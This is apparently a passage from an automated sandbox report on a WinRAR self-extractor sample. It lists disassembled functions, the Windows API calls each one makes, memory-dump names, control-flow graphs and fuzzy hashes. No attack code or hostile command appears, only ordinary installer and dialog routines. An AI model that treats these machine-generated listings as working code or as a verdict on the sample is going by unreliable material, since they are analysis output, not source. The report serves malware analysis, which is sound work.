    • Instruction Fuzzy Hash: 17A2F971904245AEDF15DF68C89DBEDBBB8FF05300F0841BDE9599B182DB309A48DBA1
    Function 00CB91A0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C1
    • TerminateProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C8
    • ExitProcess.KERNEL32 ref: 00CB91DA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 6c8850bfba9347372e3e0e956877e95a0e70e612ba65f0f816a43da45af5e0b3
    • Instruction ID: 5a641e2a65acaf5f51e5698c8e290386dda84954e2d19d003278df61518f947a
    • Opcode Fuzzy Hash: 6c8850bfba9347372e3e0e956877e95a0e70e612ba65f0f816a43da45af5e0b3
    • Instruction Fuzzy Hash: B6E0B636004508ABCF15AF64DD1DF9C3F7AEB50341F018414FA099A121CB35DE92EB51
    Function 00CAB0BE Relevance: 3.1, APIs: 2, Instructions: 77comCOMMON
    Download Yara Rule
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 00CAB0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,00CC64FC,?), ref: 00CAB0E6
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateFromInstanceString
    • String ID:
    • API String ID: 432265043-0
    • Opcode ID: 8e6d41e37c3d2c9c98cb77a57ec9860436f4ed892d6e273e3cf50136b14bb988
    • Instruction ID: 36fe804908a98d499bc6aee2fcb4c1b032de2fca784eba18de1b0a63b628a45e
    • Opcode Fuzzy Hash: 8e6d41e37c3d2c9c98cb77a57ec9860436f4ed892d6e273e3cf50136b14bb988
    • Instruction Fuzzy Hash: 9D213975600119EFDB04DF68CC69E5EBBB8EF48705B1140A9FA06E7261CB71AD42CF90
    Function 00CAB080 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
    Download Yara Rule
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 00CAB098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00CAB0B3
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: 131acd3674fa1004730ed375f366a6b8d0898b7eb73dfba72a670913548cfe29
    • Instruction ID: 5fcfe0725dada72d0ed87e77acaf9291fab53fcee9e6cada7201f35c2e332e0f
    • Opcode Fuzzy Hash: 131acd3674fa1004730ed375f366a6b8d0898b7eb73dfba72a670913548cfe29
    • Instruction Fuzzy Hash: 67E01A3610011DBBCF119F99DD08D9F3F69EF8A770B00C016FA1996160C771A961EBA1
    Function 00CA7DCC Relevance: .3, Instructions: 343COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 0eab49bf5d0bbce9bb887d6fc13f8fa7c49c5a75d6aaa616284d2eec9f612ebd
    • Instruction ID: 1d92a571c1aa639986ee6f2380a5561950e148fe1f0f17bc8bbe060282f0b342
    • Opcode Fuzzy Hash: 0eab49bf5d0bbce9bb887d6fc13f8fa7c49c5a75d6aaa616284d2eec9f612ebd
    • Instruction Fuzzy Hash: 59D1B471A083428FCB14DF28C88479BBBE1BF8630CF04466DE99997242D734EE49CB56
    Function 00CAC9C0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 734windowfilesleepCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00CAC9C5
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CACAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CACACF
    • IsDialogMessageW.USER32(?,?), ref: 00CACAE2
    • TranslateMessage.USER32(?), ref: 00CACAF0
    • DispatchMessageW.USER32(?), ref: 00CACAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CACB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CACB40
    • GetDlgItem.USER32(?,00000068), ref: 00CACB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CACB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC45F4), ref: 00CACB91
      • Part of subcall function 00CAE586: _wcslen.LIBCMT ref: 00CAE5B0
    • SetFocus.USER32(00000000), ref: 00CACB98
    • _swprintf.LIBCMT ref: 00CACBF7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CACC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CACC82
    • GetTickCount.KERNEL32 ref: 00CACCA0
    • _swprintf.LIBCMT ref: 00CACCB8
    • GetLastError.KERNEL32(?,00000011), ref: 00CACCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CACD3D
    • _swprintf.LIBCMT ref: 00CACD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00CACDC8
    • GetCommandLineW.KERNEL32 ref: 00CACDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00CE1482,00000400,00000001,00000001), ref: 00CACE35
    • Sleep.KERNEL32(00000064), ref: 00CACEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00CE1482,00000400), ref: 00CACECE
    • CloseHandle.KERNEL32(00000000), ref: 00CACED7
    • _swprintf.LIBCMT ref: 00CACF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CACF69
    • SetDlgItemTextW.USER32(?,00000065,00CC45F4), ref: 00CACF80
    • GetDlgItem.USER32(?,00000065), ref: 00CACF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CACF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CACFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD054
    • _wcslen.LIBCMT ref: 00CAD0AA
    • _swprintf.LIBCMT ref: 00CAD0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CAD11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CAD138
    • GetDlgItem.USER32(?,00000068), ref: 00CAD141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CAD157
    • GetDlgItem.USER32(?,00000066), ref: 00CAD171
    • SetWindowTextW.USER32(00000000,00CE389A), ref: 00CAD193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CAD1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 00CAD2A9
    • EnableWindow.USER32(00000000,00000000), ref: 00CAD383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CAD3C5
      • Part of subcall function 00CAD872: __EH_prolog.LIBCMT ref: 00CAD877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CAD3E9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: f94568a09bed862125ae988052d68a24f303ba6c3a4183bd01cd2fe0fef64a85
    • Instruction ID: a118fb6f8880c726a9b9196425e048f43ca6e12912000f1a46a3191af7e54f14
    • Opcode Fuzzy Hash: f94568a09bed862125ae988052d68a24f303ba6c3a4183bd01cd2fe0fef64a85
    • Instruction Fuzzy Hash: E542F870940245BEEF21AB70DC8EFBE77BCAB02708F044155F652A60E2CBB45E45DB62
    Function 00CA1B7C Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 ca1b7c-ca1b9f call caffc0 GetModuleHandleW 277 ca1c00-ca1e61 274->277 278 ca1ba1-ca1bb8 GetProcAddress 274->278 279 ca1f2d-ca1f59 GetModuleFileNameW call c9d6a7 call ca1928 277->279 280 ca1e67-ca1e72 call cb89de 277->280 281 ca1bba-ca1bd0 278->281 282 ca1bd2-ca1be2 GetProcAddress 278->282 297 ca1f5b-ca1f67 call c9c619 279->297 280->279 292 ca1e78-ca1ea6 GetModuleFileNameW CreateFileW 280->292 281->282 285 ca1bfe 282->285 286 ca1be4-ca1bf9 282->286 285->277 286->285 294 ca1ea8-ca1eb4 SetFilePointer 292->294 295 ca1f21-ca1f28 CloseHandle 292->295 294->295 298 ca1eb6-ca1ed2 ReadFile 294->298 295->279 304 ca1f69-ca1f74 call ca1b34 297->304 305 ca1f96-ca1fbd call c9d71d GetFileAttributesW 297->305 298->295 300 ca1ed4-ca1ef9 298->300 302 ca1f16-ca1f1f call ca1697 300->302 302->295 310 ca1efb-ca1f15 call ca1b34 302->310 304->305 315 ca1f76-ca1f94 CompareStringW 304->315 312 ca1fbf-ca1fc3 305->312 313 ca1fc7 305->313 310->302 312->297 316 ca1fc5 312->316 317 ca1fc9-ca1fce 313->317 315->305 315->312 316->317 319 ca1fd0 317->319 320 ca2005-ca2007 317->320 321 ca1fd2-ca1ff9 call c9d71d GetFileAttributesW 319->321 322 ca200d-ca2024 call c9d6f1 call c9c619 320->322 323 ca2114-ca211e 320->323 329 ca1ffb-ca1fff 321->329 330 ca2003 321->330 333 ca208c-ca20bf call c94a20 AllocConsole 322->333 334 ca2026-ca2087 call ca1b34 * 2 call c9f937 call c94a20 call c9f937 call cab7e4 322->334 329->321 332 ca2001 329->332 330->320 332->320 339 ca210c-ca210e ExitProcess 333->339 340 ca20c1-ca2106 GetCurrentProcessId AttachConsole call cb4f93 GetStdHandle WriteConsoleW Sleep FreeConsole 333->340 334->339 340->339
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 00CA1B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA1BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA1BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CA1E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA1E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CA1EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,00CC4D24,00000000), ref: 00CA1ECA
    • CloseHandle.KERNEL32(00000000), ref: 00CA1F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CA1F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CC4D24,?,00000000,?,00000800), ref: 00CA1F8B
    • GetFileAttributesW.KERNEL32(?,?,00CC4D24,00000800,?,00000000,?,00000800), ref: 00CA1FB5
    • GetFileAttributesW.KERNEL32(?,?,00CC4DEC,00000800), ref: 00CA1FF1
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • _swprintf.LIBCMT ref: 00CA2063
    • _swprintf.LIBCMT ref: 00CA20AF
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • AllocConsole.KERNEL32 ref: 00CA20B7
    • GetCurrentProcessId.KERNEL32 ref: 00CA20C1
    • AttachConsole.KERNEL32(00000000), ref: 00CA20C8
    • _wcslen.LIBCMT ref: 00CA20DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CA20EE
    • WriteConsoleW.KERNEL32(00000000), ref: 00CA20F5
    • Sleep.KERNEL32(00002710), ref: 00CA2100
    • FreeConsole.KERNEL32 ref: 00CA2106
    • ExitProcess.KERNEL32 ref: 00CA210E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 3cbbed0c9f95946f22fb438155077767476a423f3fedd3edad3e3703f1efac63
    • Instruction ID: 75cd1bf010df09c4c7ac2df7dcda87687a28ad5c4d01267d546b703af9a43441
    • Opcode Fuzzy Hash: 3cbbed0c9f95946f22fb438155077767476a423f3fedd3edad3e3703f1efac63
    • Instruction Fuzzy Hash: 69D18DF10483859FDB349F90D858F9FBBE8FB85308F45891DF69996140CBB09549CBA2
    Function 00C9ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C9ED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C9EDCC
      • Part of subcall function 00C9D6A7: _wcslen.LIBCMT ref: 00C9D6AF
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00CA2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C9CF18,00000000,?,?), ref: 00CA2EDE
    • _wcslen.LIBCMT ref: 00C9F109
    • __fprintf_l.LIBCMT ref: 00C9F23C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: 36cda248438d21e91389aa26749b7e1a9f59e5d976ea060d9b700b568e6d55de
    • Instruction ID: 888bde6ab5c0666976f92c6382db088853b74ae5f03c2091fa0c25186a546bb3
    • Opcode Fuzzy Hash: 36cda248438d21e91389aa26749b7e1a9f59e5d976ea060d9b700b568e6d55de
    • Instruction Fuzzy Hash: C632CD71900219EBCF24EF68C849BEE37A8BF14704F44456EF916D7291EB719E86CB90
    Function 00CAAEE5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 658 caaee5-caaf13 ShowWindow call caac14 661 caaf1e-caaf23 658->661 662 caaf15-caaf1d call cb5209 658->662 664 caaf29-caaf32 call cb8a08 661->664 665 caaf25-caaf27 661->665 662->661 667 caaf33-caaf3b 664->667 665->667 670 caaf3d-caaf3f 667->670 671 caaf41-caaf4a call cb8a08 667->671 672 caaf4b-caaf75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 675 caaf80-caafc9 GetParent CreateWindowExW 672->675 676 caaf77-caaf7a DestroyWindow 672->676 677 caafcb-caafce 675->677 678 cab008-cab00a 675->678 676->675 677->678 681 caafd0-caafd2 677->681 679 cab01e-cab024 678->679 680 cab00c-cab018 ShowWindow UpdateWindow 678->680 680->679 681->679 682 caafd4-caafd7 681->682 682->679 683 caafd9-caafdc 682->683 683->679 684 caafde-caafec call caad0e 683->684 684->679 687 caafee-cab006 ShowWindow SetWindowTextW call cb5209 684->687 687->679
    APIs
    • ShowWindow.USER32(?,00000000), ref: 00CAAEFE
      • Part of subcall function 00CAAC14: LoadCursorW.USER32(00000000,00007F00), ref: 00CAAC4B
      • Part of subcall function 00CAAC14: RegisterClassExW.USER32(00000030), ref: 00CAAC6C
    • GetWindowRect.USER32(?,?), ref: 00CAAF54
    • GetParent.USER32(?), ref: 00CAAF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 00CAAF6B
    • DestroyWindow.USER32(00000000), ref: 00CAAF7A
    • GetParent.USER32(?), ref: 00CAAF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 00CAAFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 00CAAFF1
    • SetWindowTextW.USER32(?,00000000), ref: 00CAAFF9
    • ShowWindow.USER32(00000000,00000005), ref: 00CAB00F
    • UpdateWindow.USER32(00000000), ref: 00CAB018
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: 3ca97fcf66f7529db516a1d511e70f334c1e0dfcc0b23552d90c65a93f7e4594
    • Instruction ID: a9b3cdc5726b7f83d2c985dcb880bd797f9732ca15b0dfc184a958ee94db276e
    • Opcode Fuzzy Hash: 3ca97fcf66f7529db516a1d511e70f334c1e0dfcc0b23552d90c65a93f7e4594
    • Instruction Fuzzy Hash: 3141E271004205AFDB219F60DC49B6F7FA8FF09309F148659FA5A99052DB30ED04DB66
    Function 00CAE607 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    • GetDlgItem.USER32(00000068,00CF1CF0), ref: 00CAE61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAE643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CAE64E
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC45F4), ref: 00CAE65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CAE672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CAE68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CAE6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CAE6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CAE6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CAE714
    • SendMessageW.USER32(00000000,000000C2,00000000,00CC549C), ref: 00CAE723
      • Part of subcall function 00CAA235: DestroyWindow.USER32(?,00000000,00CAE640,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAA241
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: 5d6a841e0aa5be34b02b04eb9ef21195277466c4cbc92325c0c85a6067dfd244
    • Instruction ID: 2347d2a8cc092757affcc7db19354b364996d281b90e2378d2126cb62c42fdca
    • Opcode Fuzzy Hash: 5d6a841e0aa5be34b02b04eb9ef21195277466c4cbc92325c0c85a6067dfd244
    • Instruction Fuzzy Hash: 4931AD71145B41ABE301DF20AC4AFAF3FACEB82704F004919F7A1961A0C7656A04CBA7
    Function 00CBBB0B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
